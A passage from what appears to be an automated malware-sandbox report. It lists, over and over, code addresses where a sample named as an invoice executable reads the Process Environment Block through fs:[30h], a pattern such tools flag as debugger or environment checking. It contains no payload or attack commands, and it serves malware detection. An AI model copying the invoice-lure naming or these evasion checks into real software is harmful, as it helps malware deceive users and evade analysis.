            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E609 mov eax, dword ptr fs:[00000030h]2_2_0106E609
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032619 mov eax, dword ptr fs:[00000030h]2_2_01032619
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01026620 mov eax, dword ptr fs:[00000030h]2_2_01026620
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01028620 mov eax, dword ptr fs:[00000030h]2_2_01028620
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100E627 mov eax, dword ptr fs:[00000030h]2_2_0100E627
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFC7C0 mov eax, dword ptr fs:[00000030h]2_2_00FFC7C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100C640 mov eax, dword ptr fs:[00000030h]2_2_0100C640
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF07AF mov eax, dword ptr fs:[00000030h]2_2_00FF07AF
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A660 mov eax, dword ptr fs:[00000030h]2_2_0102A660
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A660 mov eax, dword ptr fs:[00000030h]2_2_0102A660
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B866E mov eax, dword ptr fs:[00000030h]2_2_010B866E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B866E mov eax, dword ptr fs:[00000030h]2_2_010B866E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01022674 mov eax, dword ptr fs:[00000030h]2_2_01022674
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF8770 mov eax, dword ptr fs:[00000030h]2_2_00FF8770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C6A6 mov eax, dword ptr fs:[00000030h]2_2_0102C6A6
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF0750 mov eax, dword ptr fs:[00000030h]2_2_00FF0750
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010266B0 mov eax, dword ptr fs:[00000030h]2_2_010266B0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0102A6C7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A6C7 mov eax, dword ptr fs:[00000030h]2_2_0102A6C7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF0710 mov eax, dword ptr fs:[00000030h]2_2_00FF0710
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E6F2 mov eax, dword ptr fs:[00000030h]2_2_0106E6F2
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E6F2 mov eax, dword ptr fs:[00000030h]2_2_0106E6F2
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E6F2 mov eax, dword ptr fs:[00000030h]2_2_0106E6F2
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E6F2 mov eax, dword ptr fs:[00000030h]2_2_0106E6F2
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010706F1 mov eax, dword ptr fs:[00000030h]2_2_010706F1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010706F1 mov eax, dword ptr fs:[00000030h]2_2_010706F1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E908 mov eax, dword ptr fs:[00000030h]2_2_0106E908
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E908 mov eax, dword ptr fs:[00000030h]2_2_0106E908
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107C912 mov eax, dword ptr fs:[00000030h]2_2_0107C912
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0108892B mov eax, dword ptr fs:[00000030h]2_2_0108892B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107892A mov eax, dword ptr fs:[00000030h]2_2_0107892A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01070946 mov eax, dword ptr fs:[00000030h]2_2_01070946
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01016962 mov eax, dword ptr fs:[00000030h]2_2_01016962
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01016962 mov eax, dword ptr fs:[00000030h]2_2_01016962
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01016962 mov eax, dword ptr fs:[00000030h]2_2_01016962
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0103096E mov eax, dword ptr fs:[00000030h]2_2_0103096E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0103096E mov edx, dword ptr fs:[00000030h]2_2_0103096E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0103096E mov eax, dword ptr fs:[00000030h]2_2_0103096E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01094978 mov eax, dword ptr fs:[00000030h]2_2_01094978
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01094978 mov eax, dword ptr fs:[00000030h]2_2_01094978
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF0887 mov eax, dword ptr fs:[00000030h]2_2_00FF0887
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107C97C mov eax, dword ptr fs:[00000030h]2_2_0107C97C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h]2_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF4859 mov eax, dword ptr fs:[00000030h]2_2_00FF4859
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF4859 mov eax, dword ptr fs:[00000030h]2_2_00FF4859
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010789B3 mov esi, dword ptr fs:[00000030h]2_2_010789B3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010789B3 mov eax, dword ptr fs:[00000030h]2_2_010789B3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010789B3 mov eax, dword ptr fs:[00000030h]2_2_010789B3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010869C0 mov eax, dword ptr fs:[00000030h]2_2_010869C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010249D0 mov eax, dword ptr fs:[00000030h]2_2_010249D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BA9D3 mov eax, dword ptr fs:[00000030h]2_2_010BA9D3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107E9E0 mov eax, dword ptr fs:[00000030h]2_2_0107E9E0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010229F9 mov eax, dword ptr fs:[00000030h]2_2_010229F9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010229F9 mov eax, dword ptr fs:[00000030h]2_2_010229F9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107C810 mov eax, dword ptr fs:[00000030h]2_2_0107C810
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA9D0 mov eax, dword ptr fs:[00000030h]2_2_00FFA9D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA9D0 mov eax, dword ptr fs:[00000030h]2_2_00FFA9D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA9D0 mov eax, dword ptr fs:[00000030h]2_2_00FFA9D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA9D0 mov eax, dword ptr fs:[00000030h]2_2_00FFA9D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA9D0 mov eax, dword ptr fs:[00000030h]2_2_00FFA9D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA9D0 mov eax, dword ptr fs:[00000030h]2_2_00FFA9D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A830 mov eax, dword ptr fs:[00000030h]2_2_0102A830
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109483A mov eax, dword ptr fs:[00000030h]2_2_0109483A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109483A mov eax, dword ptr fs:[00000030h]2_2_0109483A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01012835 mov eax, dword ptr fs:[00000030h]2_2_01012835
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01012835 mov eax, dword ptr fs:[00000030h]2_2_01012835
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01012835 mov eax, dword ptr fs:[00000030h]2_2_01012835
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01012835 mov ecx, dword ptr fs:[00000030h]2_2_01012835
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01012835 mov eax, dword ptr fs:[00000030h]2_2_01012835
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01012835 mov eax, dword ptr fs:[00000030h]2_2_01012835
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01002840 mov ecx, dword ptr fs:[00000030h]2_2_01002840
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF09AD mov eax, dword ptr fs:[00000030h]2_2_00FF09AD
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF09AD mov eax, dword ptr fs:[00000030h]2_2_00FF09AD
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01020854 mov eax, dword ptr fs:[00000030h]2_2_01020854
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107E872 mov eax, dword ptr fs:[00000030h]2_2_0107E872
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107E872 mov eax, dword ptr fs:[00000030h]2_2_0107E872
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01086870 mov eax, dword ptr fs:[00000030h]2_2_01086870
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01086870 mov eax, dword ptr fs:[00000030h]2_2_01086870
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107C89D mov eax, dword ptr fs:[00000030h]2_2_0107C89D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E8C0 mov eax, dword ptr fs:[00000030h]2_2_0101E8C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE8918 mov eax, dword ptr fs:[00000030h]2_2_00FE8918
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE8918 mov eax, dword ptr fs:[00000030h]2_2_00FE8918
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BA8E4 mov eax, dword ptr fs:[00000030h]2_2_010BA8E4
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C8F9 mov eax, dword ptr fs:[00000030h]2_2_0102C8F9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C8F9 mov eax, dword ptr fs:[00000030h]2_2_0102C8F9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h]2_2_0106EB1D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h]2_2_0106EB1D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h]2_2_0106EB1D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h]2_2_0106EB1D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h]2_2_0106EB1D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h]2_2_0106EB1D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h]2_2_0106EB1D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h]2_2_0106EB1D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h]2_2_0106EB1D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101EB20 mov eax, dword ptr fs:[00000030h]2_2_0101EB20
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101EB20 mov eax, dword ptr fs:[00000030h]2_2_0101EB20
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B8B28 mov eax, dword ptr fs:[00000030h]2_2_010B8B28
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B8B28 mov eax, dword ptr fs:[00000030h]2_2_010B8B28
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF0AD0 mov eax, dword ptr fs:[00000030h]2_2_00FF0AD0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01086B40 mov eax, dword ptr fs:[00000030h]2_2_01086B40
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01086B40 mov eax, dword ptr fs:[00000030h]2_2_01086B40
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BAB40 mov eax, dword ptr fs:[00000030h]2_2_010BAB40
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01098B42 mov eax, dword ptr fs:[00000030h]2_2_01098B42
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF8AA0 mov eax, dword ptr fs:[00000030h]2_2_00FF8AA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF8AA0 mov eax, dword ptr fs:[00000030h]2_2_00FF8AA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h]2_2_00FFEA80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h]2_2_00FFEA80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h]2_2_00FFEA80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h]2_2_00FFEA80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h]2_2_00FFEA80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h]2_2_00FFEA80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h]2_2_00FFEA80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h]2_2_00FFEA80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h]2_2_00FFEA80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h]2_2_00FF6A50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h]2_2_00FF6A50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h]2_2_00FF6A50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h]2_2_00FF6A50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h]2_2_00FF6A50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h]2_2_00FF6A50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h]2_2_00FF6A50
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000BBE mov eax, dword ptr fs:[00000030h]2_2_01000BBE
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000BBE mov eax, dword ptr fs:[00000030h]2_2_01000BBE
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01010BCB mov eax, dword ptr fs:[00000030h]2_2_01010BCB
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01010BCB mov eax, dword ptr fs:[00000030h]2_2_01010BCB
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01010BCB mov eax, dword ptr fs:[00000030h]2_2_01010BCB
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109EBD0 mov eax, dword ptr fs:[00000030h]2_2_0109EBD0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107CBF0 mov eax, dword ptr fs:[00000030h]2_2_0107CBF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101EBFC mov eax, dword ptr fs:[00000030h]2_2_0101EBFC
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF8BF0 mov eax, dword ptr fs:[00000030h]2_2_00FF8BF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF8BF0 mov eax, dword ptr fs:[00000030h]2_2_00FF8BF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF8BF0 mov eax, dword ptr fs:[00000030h]2_2_00FF8BF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107CA11 mov eax, dword ptr fs:[00000030h]2_2_0107CA11
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102CA24 mov eax, dword ptr fs:[00000030h]2_2_0102CA24
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101EA2E mov eax, dword ptr fs:[00000030h]2_2_0101EA2E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF0BCD mov eax, dword ptr fs:[00000030h]2_2_00FF0BCD
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF0BCD mov eax, dword ptr fs:[00000030h]2_2_00FF0BCD
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF0BCD mov eax, dword ptr fs:[00000030h]2_2_00FF0BCD
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01014A35 mov eax, dword ptr fs:[00000030h]2_2_01014A35
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01014A35 mov eax, dword ptr fs:[00000030h]2_2_01014A35
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000A5B mov eax, dword ptr fs:[00000030h]2_2_01000A5B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000A5B mov eax, dword ptr fs:[00000030h]2_2_01000A5B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102CA6F mov eax, dword ptr fs:[00000030h]2_2_0102CA6F
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102CA6F mov eax, dword ptr fs:[00000030h]2_2_0102CA6F
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102CA6F mov eax, dword ptr fs:[00000030h]2_2_0102CA6F
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106CA72 mov eax, dword ptr fs:[00000030h]2_2_0106CA72
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106CA72 mov eax, dword ptr fs:[00000030h]2_2_0106CA72
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FECB7E mov eax, dword ptr fs:[00000030h]2_2_00FECB7E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4A80 mov eax, dword ptr fs:[00000030h]2_2_010C4A80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01028A90 mov edx, dword ptr fs:[00000030h]2_2_01028A90
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01046AA4 mov eax, dword ptr fs:[00000030h]2_2_01046AA4
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01046ACC mov eax, dword ptr fs:[00000030h]2_2_01046ACC
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01046ACC mov eax, dword ptr fs:[00000030h]2_2_01046ACC
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01046ACC mov eax, dword ptr fs:[00000030h]2_2_01046ACC
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01024AD0 mov eax, dword ptr fs:[00000030h]2_2_01024AD0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01024AD0 mov eax, dword ptr fs:[00000030h]2_2_01024AD0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102AAEE mov eax, dword ptr fs:[00000030h]2_2_0102AAEE
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102AAEE mov eax, dword ptr fs:[00000030h]2_2_0102AAEE
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100AD00 mov eax, dword ptr fs:[00000030h]2_2_0100AD00
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100AD00 mov eax, dword ptr fs:[00000030h]2_2_0100AD00
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100AD00 mov eax, dword ptr fs:[00000030h]2_2_0100AD00
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A8D10 mov eax, dword ptr fs:[00000030h]2_2_010A8D10
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A8D10 mov eax, dword ptr fs:[00000030h]2_2_010A8D10
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01024D1D mov eax, dword ptr fs:[00000030h]2_2_01024D1D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01078D20 mov eax, dword ptr fs:[00000030h]2_2_01078D20
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FECCC8 mov eax, dword ptr fs:[00000030h]2_2_00FECCC8
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01088D6B mov eax, dword ptr fs:[00000030h]2_2_01088D6B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE8C8D mov eax, dword ptr fs:[00000030h]2_2_00FE8C8D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4DAD mov eax, dword ptr fs:[00000030h]2_2_010C4DAD
